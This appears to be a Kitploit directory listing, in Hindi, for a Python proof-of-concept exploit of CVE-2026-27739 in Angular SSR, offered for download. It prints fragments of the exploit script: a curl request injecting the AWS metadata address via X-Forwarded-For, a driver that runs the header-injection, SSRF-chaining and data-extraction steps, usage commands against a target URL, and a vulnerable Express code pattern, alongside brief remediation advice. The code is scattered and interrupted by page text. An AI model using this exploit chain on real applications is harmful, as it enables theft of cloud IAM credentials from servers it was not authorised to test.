Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-27739-POC — Python PoC जो Angular SSR में CVE-2026-27739 का उपयोग करता है: prototype pollution के माध्यम से header injection और credential चोरी के लिए AWS IMDS/GCP metadata तक SSRF chaining। | Kitploit
उपकरण/GitHubGitHub/mr-redoo7/cve-2026-27739-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगAPI सुरक्षा
GitHubmr-redoo7/cve-2026-27739-poc

CVE-2026-27739-POC

Python PoC जो Angular SSR में CVE-2026-27739 का उपयोग करता है: prototype pollution के माध्यम से header injection और credential चोरी के लिए AWS IMDS/GCP metadata तक SSRF chaining।

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

-CVE-2026-27739-poc

curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}

2. प्रोटोटाइप प्रदूषण के माध्यम से हेडर इंजेक्शन (CVSS: 7.5)

विवरण: Angular SSR असुरक्षित क्वेरी पैरामीटर को प्रोसेस करता है जो प्रोटोटाइप चेन को प्रभावित करते हैं प्रभाव: रिक्वेस्ट हेडर मैनिपुलेशन, संभावित SSRF चेनिंग

उपचार

  1. X-Forwarded-* हेडर प्रोसेसिंग को हटाएं/अक्षम करें या ज्ञात प्रॉक्सी को व्हाइटलिस्ट करें
  2. SSRF-प्रवण ऑपरेशन्स से पहले सख्त URL वैलिडेशन लागू करें
  3. हेडर सैनिटाइजेशन के लिए express-validator या समान का उपयोग करें
  4. AWS/GCP मेटाडेटा एंडपॉइंट्स को अक्षम करें या हॉप लिमिट के साथ IMDSv2 का उपयोग करें """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report)

def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")

root@kitploit:~
args = parser.parse_args()

exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)

print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")

# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()

if name == "main": main() उपयोग bash

Basic SSRF test

python3 angular_ssr_exploit.py https://target.com

With SSL bypass for self-signed certs

python3 angular_ssr_exploit.py https://target.com --no-ssl-verify यह कैसे काम करता है हेडर इंजेक्शन टेस्ट: प्रोटोटाइप प्रदूषण पेलोड और असुरक्षित फॉरवर्डेड हेडर भेजता है जिन्हें Angular SSR असुरक्षित रूप से प्रोसेस कर सकता है SSRF चेन: X-Forwarded-For/X-Original-URL के माध्यम से AWS IMDS, GCP मेटाडेटा, लोकलहोस्ट सेवाओं तक पहुंच का परीक्षण करता है IMDSv2 टोकन एक्सट्रैक्शन: AWS मेटाडेटा टोकन चुराने के लिए SSRF को चेन करता है फिर IAM क्रेडेंशियल्स स्वचालित रिपोर्टिंग: PoCs के साथ CVSS-स्कोर किया गया पेंटेस्ट रिपोर्ट जनरेट करता है तकनीकी विवरण मूल कारण: Angular Universal SSR ऐप्स अक्सर req.headers को सैनिटाइजेशन के बिना सीधे आंतरिक API को फॉरवर्ड करते हैं:

javascript

// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

टूल डाउनलोड करें